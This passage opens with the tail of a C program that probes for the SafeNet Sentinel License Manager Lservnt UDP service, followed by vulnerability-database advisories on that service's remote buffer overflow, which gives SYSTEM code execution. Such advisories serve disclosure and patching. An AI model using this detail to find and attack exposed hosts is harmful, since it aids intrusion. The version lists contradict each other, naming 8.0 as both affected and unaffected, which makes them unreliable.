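    else if (r == 0) printf("%s: no matching reply on UDP/%s (closed, filtered, or not lservnt)\n", argv[1], port);
    else             perror("probe");
    return r == 1 ? 0 : 1;
}
```

A reply that does not start with 0x7a is reported as "no matching reply" rather than as an error, so that a filtered port, a closed port and an unrelated UDP service all land in the same bucket; only resolver and socket failures return -1.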

Module source: the same sentinel_lm7_udp.rb as in the EDB-ID 16746 listing above.
    

- Vulnerability information

OSVDB ID: 14605
SafeNet Sentinel License Manager Lservnt Service Remote Overflow
Location: Remote / Network Access    Attack type: Input Manipulation
Impact: Loss of Integrity
Exploit: Public

- Vulnerability description

A remote overflow exists in Sentinel License Manager. The Lservnt service fails to properly check the size of data sent to the server resulting in a buffer overflow. With a specially crafted request, an attacker can cause a buffer overflow resulting in a loss of confidentiality and integrity.

- Timeline

Disclosure date: 2005-03-07    Discovery date: 2004-12-06
Exploit publish date: 2005-03-13    Solution date: Unknown

- Solution

Upgrade to version 8.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information

SafeNet Sentinel License Manager Remote Buffer Overflow Vulnerability
Class: Input Validation Error    BID: 12742
Remote: Yes    Local: No
Published: 2005-03-07 12:00:00    Updated: 2009-07-12 10:56:00
Dennis Rand is credited with the discovery of this issue.

- Affected program versions

SafeNet Sentinel License Manager 7.2.0.2
SafeNet Sentinel License Manager 8.0

- Unaffected program versions

SafeNet Sentinel License Manager 8.0

- Vulnerability discussion

A remote buffer overflow vulnerability affects SafeNet Sentinel License Manager. This issue is due to a failure of the application to securely copy network-derived data into finite process buffers.

An attacker may leverage this issue to execute arbitrary code with SYSTEM privileges.

- Exploit

The following exploit has been released. It should be noted that 'sentinel_lm7_overflow.pm' is designed to work with the metasploit framework.

- Solution

SafeNet has released Sentinel License Manager version 8.0 dealing with this issue. Please contact the vendor for more information on obtaining the upgrade.
